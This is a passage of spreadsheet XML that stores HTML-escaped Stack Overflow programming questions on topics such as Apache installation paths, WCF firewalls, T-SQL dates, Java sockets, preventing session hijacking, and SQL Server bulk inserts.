&lt;p&gt;We tell our clients to install the binaries (on their UNIX servers) under the same directory structure that we compiled it under. For some clients this is not appropriate, e.g. where there are restrictions on where they can install software on their servers and they don't want to compile Apache themselves.&lt;/p&gt;
&lt;p&gt;Is there a way of compiling Apache HTTP Server so its installation location(s) can be specified dynamically using environment variables ?&lt;/p&gt;
&lt;p&gt;I spent a few days trying to sort this out and couldn't find a way to do it. It led me to believe that the Apache binaries were hard coding some directory paths at compilation preventing the portability we require.&lt;/p&gt;
&lt;p&gt;Has anyone managed to do this ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF push to client through firewall?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;See also &lt;a href="http://stackoverflow.com/questions/1700917/how-does-a-wcf-server-inform-a-wcf-client-about-changes-better-solution-then-si"&gt;How does a WCF server inform
  a WCF client about changes? (Better
  solution then simple polling, e.g.
  Coment or long polling)&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I need to use push-technology with WCF through client firewalls. This must be a common problem, and I know for a fact it works in theory (see links below), but I have failed to get it working, and I haven't been able to find a code sample that demonstrates it.&lt;/p&gt;
&lt;p&gt;Requirements: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;WCF&lt;/li&gt;
&lt;li&gt;Clients connects to server through tcp port 80 (netTcpBinding).&lt;/li&gt;
&lt;li&gt;Server pushes back information at irregular intervals (1 min to several hours).&lt;/li&gt;
&lt;li&gt;Users should not have to configure their firewalls, server pushes must pass through firewalls that have all inbound ports closed. TCP duplex on the same connection is needed for this, a dual binding does not work since a port has to be opened on the client firewall.&lt;/li&gt;
&lt;li&gt;Clients sends heartbeats to server at regular intervals (perhaps every 15 mins) so server knows client is still alive.&lt;/li&gt;
&lt;li&gt;Server is IIS7 with WAS.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The solution seems to be duplex netTcpBinding. Based on this information:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://blogs.msdn.com/drnick/archive/2006/05/01/configuring-wcf-for-nats-and-firewalls.aspx"&gt;WCF through firewalls and NATs&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://blogs.msdn.com/drnick/archive/2006/10/20/keeping-connections-open-in-iis.aspx"&gt;Keeping connections open in IIS&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But I have yet to find a code sample that works.. I've tried combining the "Duplex" and "TcpActivation" samples from Microsoft's WCF Samples without any luck. Please can someone point me to example code that works, or build a small sample app. Thanks a lot!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the major differences between ANSI C and K&amp;R C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;a href="http://en.wikipedia.org/wiki/ANSI_C"&gt;Wikipedia article on ANSI C&lt;/a&gt; says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;One of the aims of the ANSI C standardization process was to produce a superset of K&amp;amp;R C (the first published standard), incorporating many of the unofficial features subsequently introduced. However, the standards committee also included several new features, such as function prototypes (borrowed from the C++ programming language), and a more capable preprocessor. The syntax for parameter declarations was also changed to reflect the C++ style.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That makes me think that there are differences. However, I didn't see a comparison between K&amp;amp;R C and ANSI C. Is there such a document? If not, what are the major differences?&lt;/p&gt;
&lt;p&gt;EDIT: I believe the K&amp;amp;R book says "ANSI C" on the cover. At least I believe the version that I have at home does. So perhaps there isn't a difference anymore?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good way to check if two datetimes are on the same calendar day in TSQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is the issue I am having: I have a large query that needs to compare datetimes in the where clause to see if two dates are on the same day.  My current solution, which sucks, is to send the datetimes into a UDF to convert them to midnight of the same day, and then check those dates for equality.  When it comes to the query plan, this is a disaster, as are almost all UDFs in joins or where clauses.  This is one of the only places in my application that I haven't been able to root out the functions and give the query optimizer something it can actually use to locate the best index.&lt;/p&gt;
&lt;p&gt;In this case, merging the function code back into the query seems impractical.&lt;/p&gt;
&lt;p&gt;I think I am missing something simple here.&lt;/p&gt;
&lt;p&gt;Here's the function for reference.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if not exists (select * from dbo.sysobjects 
              where id = object_id(N'dbo.f_MakeDate') and               
              type in (N'FN', N'IF', N'TF', N'FS', N'FT'))
  exec('create function dbo.f_MakeDate() returns int as 
         begin declare @retval int return @retval end')
go
alter function dbo.f_MakeDate
(
    @Day datetime, 
    @Hour int, 
    @Minute int
)
returns datetime
as
/*
Creates a datetime using the year-month-day portion of @Day, and the 
@Hour and @Minute provided
*/
begin
declare @retval datetime
set @retval = cast(
    cast(datepart(m, @Day) as varchar(2)) + 
    '/' + 
    cast(datepart(d, @Day) as varchar(2)) + 
    '/' + 
    cast(datepart(yyyy, @Day) as varchar(4)) + 
    ' ' + 
    cast(@Hour as varchar(2)) + 
    ':' + 
    cast(@Minute as varchar(2)) as datetime)
return @retval
end
go
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To complicate matters, I am joining on time zone tables to check the date against the local time, which could be different for every row:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;where 
dbo.f_MakeDate(dateadd(hh, tz.Offset + 
    case when ds.LocalTimeZone is not null 
    then 1 else 0 end, t.TheDateINeedToCheck), 0, 0) = @activityDateMidnight
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;[Edit]&lt;/p&gt;
&lt;p&gt;I'm incorporating @Todd's suggestion:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;where datediff(day, dateadd(hh, tz.Offset + 
    case when ds.LocalTimeZone is not null 
    then 1 else 0 end, t.TheDateINeedToCheck), @ActivityDate) = 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My misconception about how datediff works (the same day of year in consecutive years yields 366, not 0 as I expected) caused me to waste a lot of effort.&lt;/p&gt;
&lt;p&gt;But the query plan didn't change.  I think I need to go back to the drawing board with the whole thing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I cluster an upload folder with ASP.Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a situation where users are allowed to upload content, and then separately make some changes, then submit a form based on those changes.&lt;/p&gt;
&lt;p&gt;This works fine in a single-server, non-failover environment, however we would like some sort of solution for sharing the files between servers that supports failover.&lt;/p&gt;
&lt;p&gt;Has anyone run into this in the past?  And what kind of solutions were you able to develop?  Obviously persisting to the database is one option, but we'd prefer to avoid that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configure a Java Socket to fail-fast on disconnect?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a listening port on my server that I'm connecting to using a Java class and the &lt;code&gt;Socket&lt;/code&gt; interface, i.e.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Socket mySocket = new Socket(host,port);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then grab an &lt;code&gt;OutputStream&lt;/code&gt;, decorate with a &lt;code&gt;PrintWriter&lt;/code&gt; in autoflush mode and I'm laughing - except if the listening port closes. Then I get &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tcp4       0      0  *.9999                 *.*                    LISTEN
tcp        0      0  127.0.0.1.45737        127.0.0.1.9999         CLOSE_WAIT
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I can't seem to detect the problem in the program - I've tried using the &lt;code&gt;isConnected()&lt;/code&gt; method on the socket but it doesn't seem to know that the connection is closed.&lt;/p&gt;
&lt;p&gt;I want to be aware of the problem the next time I try and write to the Socket so that I can try and reconnect and report the issue.&lt;/p&gt;
&lt;p&gt;Any advice please?&lt;/p&gt;
&lt;p&gt;Thanks all&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to prevent session hijacking?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Specifically this is regarding when using a client session cookie to identify a session on the server.&lt;/p&gt;
&lt;p&gt;Is the best answer to use SSL/HTTPS encryption for the entire web site, and you have the best guarantee that no man in the middle attacks will be able to sniff an existing client session cookie?&lt;/p&gt;
&lt;p&gt;And perhaps second best to use some sort of encryption on the session value itself that is stored in your session cookie?&lt;/p&gt;
&lt;p&gt;If a malicious user has physical access to a machine, they can still look at the filesystem to retrieve a valid session cookie and use that to hijack a session?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Acts-as-readable Rails plugin Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Intridea's &lt;a href="http://www.intridea.com/2008/2/29/acts-as-readable-drop-in-mark-as-read-functionality"&gt;Acts as Readable&lt;/a&gt; Rails plugin for a messaging system I'm currently building.
I've defined my message class accordingly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Post &amp;lt; ActiveRecord::Base
  acts-as-readable
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And everything seems to be working according to plan, but when trying to execute to show unread messages in my message view, I'm running into problems.&lt;/p&gt;
&lt;p&gt;Their example: (I've changed underscores to hyphens due to formatting issues)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bob = User.find_by_name("bob")
bob.readings                      # =&amp;gt; []
Post.find_unread_by(bob)          # =&amp;gt; [&amp;lt;Post 1&amp;gt;,&amp;lt;Post 2&amp;gt;,&amp;lt;Post 3&amp;gt;...]
Post.find_read_by(bob)            # =&amp;gt; []
Post.find(1).read_by?(bob)        # =&amp;gt; false
Post.find(1).read_by!(bob)        # =&amp;gt; &amp;lt;Reading 1&amp;gt;
Post.find(1).read_by?(bob)        # =&amp;gt; true
Post.find(1).users_who_read       # =&amp;gt; [&amp;lt;User bob&amp;gt;]
Post.find_unread_by(bob)          # =&amp;gt; [&amp;lt;Post 2&amp;gt;,&amp;lt;Post 3&amp;gt;...]
Post.find_read_by(bob)            # =&amp;gt; [&amp;lt;Post 1&amp;gt;]
bob.readings                      # =&amp;gt; [&amp;lt;Reading 1&amp;gt;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it seems as though if I wanted to list the number of unread messages sitting in a mailbox (for example Inbox (39) ), I should be able to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%= Post.find_unread_by(current-user).count %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But to no avail.  I always seem to get stuck on the simple view issues after everything's set.
Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Does One Sum Dimensions of an Array Specified at Run-Time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a function to establish the entropy of a distribution.  It uses a copula, if any are familiar with that.  I need to sum up the values in the array based on which dimensions are "cared about."&lt;/p&gt;
&lt;p&gt;Example:  Consider the following example... &lt;/p&gt;
&lt;pre&gt;
Dimension 0 (across)
_ _ _ _ _ _ _ _ _ _ _ _ _
|_ 0 _|_ 0 _|_ 0 _|_ 2 _|  Dimension 1
|_ 1 _|_ 0 _|_ 2 _|_ 0 _|   (down)
|_ 0 _|_ 3 _|_ 0 _|_ 6 _|
|_ 0 _|_ 0 _|_ 0 _|_ 0 _|
I "care about" dimension 0 only, and "don't care" about the rest (dim 1).
Summing this array with the above specifications will
"collapse" the "stacks" of dimension 1 down to a single 4 x 1 array:
_ _ _ _ _ _ _ _ _ _ _ _ _ 
|_ 1 _|_ 3 _|_ 2 _|_ 8 _|
This can then be summed, or have any operation performed.
&lt;/pre&gt;
&lt;p&gt;I need to do this with an array of 'n' dimensions, which could feasibly be 20. Also, I need to be able to do this, caring about certain dimensions, and collapsing the rest.  I am having an especially hard time with this because I cant visualize 20 dimensions :p . If anyone could help me set up some c/c++ code to collapse/sum, I would be very very grateful.  &lt;/p&gt;
&lt;h3&gt;Update:&lt;/h3&gt;
&lt;p&gt;Just got home.  Here is some info to answer your questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Sorry for rolling back the edits, I was hoping when I clicked roll-back it would show me the changes so I could see what I messed up, a bit like wikipedia.  This wasn't the case, as I found out.&lt;/li&gt;
&lt;li&gt;@jeff - What doesnt make sense?  I am using this great service for (what I think is) a legit reason.  I want to get better at my hobby, which is all it is, as I am in high school.  Many of my posts regard implementing a genetic algorithm (This post, sparsearray, rank an array, pointer manipulation).&lt;/li&gt;
&lt;li&gt;I am using a sparse array representation, as it is possible to exceed the number of molecules in the universe using a traditional (dense) array.  For now, the implementation of the sparsearray itself doesnt matter a whole lot, as I am working to make it work with a standard array before going to a sparse representation.  For those who havent seen my previous questions, I am using a binary search tree as the structure to contain the sparse array points, and a "driver" function to traverse the tree as necessary, returning whatever the function is designed to do.  This is flexible, so I can accomodate a lot of different methods of accessing the array. &lt;/li&gt;
&lt;li&gt;The structure is a hypercube, and the number of dimensions is specified at run time, as well as the length of each dimension (which are all the same, as it is a hypercube).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks everyone for your imput.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When do you use the "this" keyword?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was curious about how other people use the &lt;strong&gt;this&lt;/strong&gt; keyword. I tend to use it in constructors, but I may also use it throughout the class in other methods. Some examples:&lt;/p&gt;
&lt;p&gt;In a constructor:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Light(Vector v)
{
    this.dir = new Vector(v);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Elsewhere&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void SomeMethod()
{
    Vector vec = new Vector();
    double d = (vec * vec) - (this.radius * this.radius);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How IE7 determines a site's Security Zone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how IE7 determines what Security Zone to use for a site?  I see the basics for IE6 &lt;a href="http://www.microsoft.com/technet/prodtechnol/ie/reskit/6/default.mspx?mfr=true" rel="nofollow"&gt;here&lt;/a&gt;, but I can't find the equivalent for IE7.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Source Control Beginners</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the best version control system to learn as a beginner to source control?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Notification of drop in drag-drop in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My C# program has a list of files that can be dragged from it and dropped into another program. My requirements are that the file be copied to a different directory first.&lt;/p&gt;
&lt;p&gt;So, can I be notified of the drop operation so that I can only copy the file if operation succeeds? I'd rather wait till I know it needs to be copied before actually performing the copy.&lt;/p&gt;
&lt;p&gt;Also, is it possible to know what program the drop operation is occurring in? Ideally I'd like to alter the filepath based on who or what its being dropped.&lt;/p&gt;
&lt;p&gt;The solution to this can be in any .NET language or C/C++ with COM.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your best list of 'must have' development tools?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently burned up my development laptop (it literally emitted smoke from the vents). After pulling the hd I was unable to get it to spin with a USB device attached to a home tower. Since I was on a deadline I had to rush and buy a new laptop (Turion 64 x2) running Vista.&lt;/p&gt;
&lt;p&gt;After I installed my required applications VS2005/2008, Sql Server editions client tools, Adobe CS3, and source control clients: &lt;strong&gt;I am wondering what list of â€œmust havesâ€ developer tools that are out there these days?&lt;/strong&gt; Iâ€™m a big fan of Fiddler and LinqPad, but I am wondering what I am missing?&lt;/p&gt;
&lt;p&gt;[edit]I read the other question here and I am aware of Hanselman's list. I was not specific enough in my original question. By "these days" I meant new and latest tools (perhaps available only 64 bit), which in geek years might just be 12 days, I dunno. :)[/edit]&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows / Active Directory - User / Groups</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to find a the windows login associated with a specific group. I'm trying to add permissions to a tool that only allows names formatted like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DOMAIN\USER 
DOMAIN\GROUP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a list of users in active directory format that I need to add:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ou=group1;ou=group2;ou=group3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried adding DOMAIN\Group1, but I get a 'user not found' error.&lt;/p&gt;
&lt;p&gt;P.S.  should also be noted that I'm not a Lan admin &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Javascript rich text editor will not break the browser's spellcheck?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using TinyMCE in an ASP.Net project, and I need a spell check. The only TinyMCE plugins I've found use PHP on the server side, and I guess I could just break down and install PHP on my server and do that, but quite frankly, what a pain. I don't want to do that.&lt;/p&gt;
&lt;p&gt;As it turns out, Firefox's built-in spell check will work fine for me, but it doesn't seem to work on TinyMCE editor boxes. I've enabled the gecko_spellcheck option, which is supposed to fix it, but it doesn't.&lt;/p&gt;
&lt;p&gt;Does anybody know of a nice rich-text editor that doesn't break the browser's spell check?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free or Open Source Collaboration/eLearning Software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for open source or free data collaboration software. Specifically this is for a non-profit organization that wants to teach remote students how a foreign language.  The idea is that an instructor would teach a class and there would be up to 10 students in the class at a time.  The instructor would be able to post slides or other teaching material and the students would be able to see it on their computers remotely.  Video is not required but audio is a must.  Any recommendations?&lt;/p&gt;
&lt;p&gt;Also if there have been any reviews or feature comparison amongst these products, I would be interested in hearing about them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good strategy for leaving an audit trail/change history for DB applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some strategies that people have had success with for maintaining a change history for data in a fairly complex database. One of the applications that I frequently use and develop for could really benefit from a more comprehensive way of tracking how records have changed over time. For instance, right now records can have a number of timestamp and modified user fields, but we currently don't have a scheme for logging multiple change, for instance if an operation is rolled back. In a perfect world, it would be possible to reconstruct the record as it was after each save, etc.&lt;/p&gt;
&lt;p&gt;Some info on the DB:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Needs to have the capacity to grow by thousands of records per week&lt;/li&gt;
&lt;li&gt;50-60 Tables&lt;/li&gt;
&lt;li&gt;Main revisioned tables may have several million records each&lt;/li&gt;
&lt;li&gt;Reasonable amount of foreign keys and indexes set&lt;/li&gt;
&lt;li&gt;Using PostgreSQL 8.x&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Factorial Algorithms in different languages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to see all the different ways you can come up with, for a factorial subroutine, or program. The hope is that anyone can come here and see if they might want to learn a new language.&lt;/p&gt;
&lt;h2&gt;Ideas:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Procedural&lt;/li&gt;
&lt;li&gt;Functional&lt;/li&gt;
&lt;li&gt;Object Oriented&lt;/li&gt;
&lt;li&gt;One liners&lt;/li&gt;
&lt;li&gt;Obfuscated&lt;/li&gt;
&lt;li&gt;Oddball&lt;/li&gt;
&lt;li&gt;Bad Code&lt;/li&gt;
&lt;li&gt;&lt;a href="http://en.wikipedia.org/wiki/Polyglot_%28computing%29" rel="nofollow"&gt;Polyglot&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Basically I want to see an example, of different ways of writing an algorithm, and what they would look like in different languages.&lt;/p&gt;
&lt;p&gt;Please limit it to one example per entry.
I will allow you to have more than one example per answer, if you are trying to highlight a specific style, language, or just a well thought out idea that lends itself to being in one post.&lt;/p&gt;
&lt;p&gt;The only real requirement is it must find the factorial of a given argument, in all languages represented.&lt;/p&gt;
&lt;h1&gt;Be Creative!&lt;/h1&gt;
&lt;h2&gt;Recommended Guideline:&lt;/h2&gt;
&lt;pre&gt;
# Language Name: Optional Style type
   - Optional bullet points
    Code Goes Here
Other informational text goes here
&lt;/pre&gt;
&lt;p&gt;I will ocasionally go along and edit any answer that does not have decent formatting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best method to get objects from a BlockingQueue in a concurrent program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best method to get objects out of a BlockingQueue, in a concurrent program, without hitting a race condition?  I'm currently doing the following and I'm not convinced it is the best method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BlockingQueue&amp;lt;Violation&amp;gt; vQueue;
/* 
in the constructor I pass in a BlockingQueue object 
full of violations that need to be processed - cut out for brevity
*/
Violation v;
while ( ( v = vQueue.poll(500, TimeUnit.MILLISECONDS) ) != null ) {
    // do stuff with the violation
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have yet to hit a race condition... but, I'm none too sure if this is truly safe.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I marshal a lambda (Proc) in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Joe Van Dyk &lt;a href="http://www.zenspider.com/pipermail/ruby/2008-August/004223.html"&gt;asked the Ruby mailing list&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Hi,&lt;/p&gt;
  &lt;p&gt;In Ruby, I guess you can't marshal a lambda/proc object, right?  Is
  that possible in lisp or other languages?&lt;/p&gt;
  &lt;p&gt;What I was trying to do:&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;l = lamda { ... }
Bj.submit "/path/to/ruby/program", :stdin =&amp;gt; Marshal.dump(l)
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
  &lt;p&gt;So, I'm sending BackgroundJob a lambda object, which contains the
  context/code for what to do.  But, guess that wasn't possible.  I
  ended up marshaling a normal ruby object that contained instructions
  for what to do after the program ran.&lt;/p&gt;
  &lt;p&gt;Joe&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Is there a site for detailed unit testing samples?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a site for unit testing as &lt;a href="http://refactormycode.com/" rel="nofollow"&gt;RefactorMyCode&lt;/a&gt; for refactoring? I think it would be a great help for beginners like me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Classes vs 2D arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which is better to use in PHP, a 2D array or a class? I've included an example of what I mean by this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Using a class
class someClass
{
    public  $name;
    public  $height;
    public  $weight;
    function __construct($name, $height, $weight)
    {
        $this -&amp;gt; name       = $name;
        $this -&amp;gt; height = $height;
        $this -&amp;gt; weight = $weight;
    }
}
$classArray[1] = new someClass('Bob', 10, 20);
$classArray[2] = new someClass('Fred', 15, 10);
$classArray[3] = new someClass('Ned', 25, 30);
// Using a 2D array
$normalArray[1]['name'] = 'Bob';
$normalArray[1]['height']   = 10;
$normalArray[1]['weight']   = 20;
$normalArray[2]['name'] = 'Fred';
$normalArray[2]['height']   = 15;
$normalArray[2]['weight']   = 10;
$normalArray[3]['name'] = 'Ned';
$normalArray[3]['height']   = 25;
$normalArray[3]['weight']   = 30;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;Assuming that somebody doesn't come out and show that classes are too slow, it looks like class wins.&lt;/p&gt;
&lt;p&gt;I've not idea which answer I should accept to I've just upvoted all of them.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;And I have now written two near identical pages, one using the 2D array (written before this question was posted) and now one using a class and I must say that the class produces much nicer code. I have no idea how much overhead is going to be generated but I doubt it will rival the improvement to the code itself.&lt;/p&gt;
&lt;p&gt;Thank you for helping to make me a better programmer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the fastest way to bulk insert a lot of data in SQL Server (C# client)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am hitting some performance bottlenecks with my C# client inserting bulk data into a SQL Server 2005 database and I'm looking for ways in which to speed up the process.&lt;/p&gt;
&lt;p&gt;I am already using the SqlClient.SqlBulkCopy (which is based on TDS) to speed up the data transfer across the wire which helped a lot, but I'm still looking for more.&lt;/p&gt;
&lt;p&gt;I have a simple table that looks like this: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; CREATE TABLE [BulkData](
 [ContainerId] [int] NOT NULL,
 [BinId] [smallint] NOT NULL,
 [Sequence] [smallint] NOT NULL,
 [ItemId] [int] NOT NULL,
 [Left] [smallint] NOT NULL,
 [Top] [smallint] NOT NULL,
 [Right] [smallint] NOT NULL,
 [Bottom] [smallint] NOT NULL,
 CONSTRAINT [PKBulkData] PRIMARY KEY CLUSTERED 
 (
  [ContainerIdId] ASC,
  [BinId] ASC,
  [Sequence] ASC
))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm inserting data in chunks that average about 300 rows where ContainerId and BinId are constant in each chunk and the Sequence value is 0-n and the values are pre-sorted based on the primary key.  &lt;/p&gt;
&lt;p&gt;The %Disk time performance counter spends a lot of time at 100% so it is clear that disk IO is the main issue but the speeds I'm getting are several orders of magnitude below a raw file copy.&lt;/p&gt;
&lt;p&gt;Does it help any if I:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Drop the Primary key while I am doing the inserting and recreate it later&lt;/li&gt;
&lt;li&gt;Do inserts into a temporary table with the same schema and periodically transfer them into the main table to keep the size of the table where insertions are happening small&lt;/li&gt;
&lt;li&gt;Anything else?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;--
Based on the responses I have gotten, let me clarify a little bit:&lt;/p&gt;
&lt;p&gt;Portman: I'm using a clustered index because when the data is all imported I will need to access data sequentially in that order.  I don't particularly need the index to be there while importing the data.  Is there any advantage to having a nonclustered PK index while doing the inserts as opposed to dropping the constraint entirely for import?&lt;/p&gt;
&lt;p&gt;Chopeen:  The data is being generated remotely on many other machines (my SQL server can only handle about 10 currently, but I would love to be able to add more).  It's not practical to run the entire process on the local machine because it would then have to process 50 times as much input data to generate the output.&lt;/p&gt;
&lt;p&gt;Jason: I am not doing any concurrent queries against the table during the import process, I will try dropping the primary key and see if that helps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the point of OOP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as I can tell, in spite of the countless millions or billions spent on OOP education, languages, and tools, OOP has not improved developer productivity or software reliability, nor has it reduced development costs. Few people use OOP in any rigorous sense (few people adhere to or understand principles such as LSP); there seems to be little uniformity or consistency to the approaches that people take to modelling problem domains.  All too often, the class is used simply for its syntactic sugar; it puts the functions for a record type into their own little namespace.&lt;/p&gt;
&lt;p&gt;I've written a large amount of code for a wide variety of applications. Although there have been places where true substitutable subtyping played a valuable role in the application, these have been pretty exceptional. In general, though much lip service is given to talk of "re-use" the reality is that unless a piece of code does &lt;em&gt;exactly&lt;/em&gt; what you want it to do, there's very little cost-effective "re-use".  It's extremely hard to design classes to be extensible &lt;em&gt;in the right way&lt;/em&gt;, and so the cost of extension is normally so great that "re-use" simply isn't worthwhile.&lt;/p&gt;
&lt;p&gt;In many regards, this doesn't surprise me.  The real world isn't "OO", and the idea implicit in OO--that we can model things with some class taxonomy--seems to me very fundamentally flawed (I can sit on a table, a tree stump, a car bonnet, someone's lap--but not one of those is-a chair).  Even if we move to more abstract domains, OO modelling is often difficult, counterintuitive, and ultimately unhelpful (consider the classic examples of circles/ellipses or squares/rectangles).&lt;/p&gt;
&lt;p&gt;So what am I missing here? Where's the value of OOP, and why has all the time and money failed to make software any better?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programming a simple IRC (Internet-Relay-Chat) Client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I started using IRC at a young age, and I have always been fascinated with it.  As a language exercise, I was thinking about programming a simple IRC client in Ruby with &lt;a href="http://www.shoooes.net/"&gt;Shoes&lt;/a&gt; as a graphical front-end.  My question to you, kind-sirs, what do I need to become familiar with to start on this great adventure (besides shoes and Ruby of course)?  I imagine there is some-sort of specification on IRC Protocol.  Any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best MVC web frameworks on the market?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a Web Framework to move windows based applications to the web.&lt;/p&gt;
&lt;p&gt;The main requirements to WF are the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;unit tests support&lt;/li&gt;
&lt;li&gt;desktop and mobile browsers support&lt;/li&gt;
&lt;li&gt;long term viability&lt;/li&gt;
&lt;li&gt;maturity of the framework&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>SQL Server: Examples of PIVOTing String data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Trying to find some simple SQL Server PIVOT examples.  Most of the examples that I have found involve counting or summing up numbers.  I just want to pivot some string data.  For example, I have a query returning the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Action1 VIEW  
Action1 EDIT  
Action2 VIEW  
Action3 VIEW  
Action3 EDIT  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to use PIVOT (if even possible) to make the results like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Action1 VIEW EDIT  
Action2 VIEW NULL  
Action3 VIEW EDIT  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this even possible with the PIVOT functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you automate a Visual Studio build?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you turn a Visual Studio build that you'd perform in the IDE into a script that you can run from the command line?&lt;/p&gt;
</t>
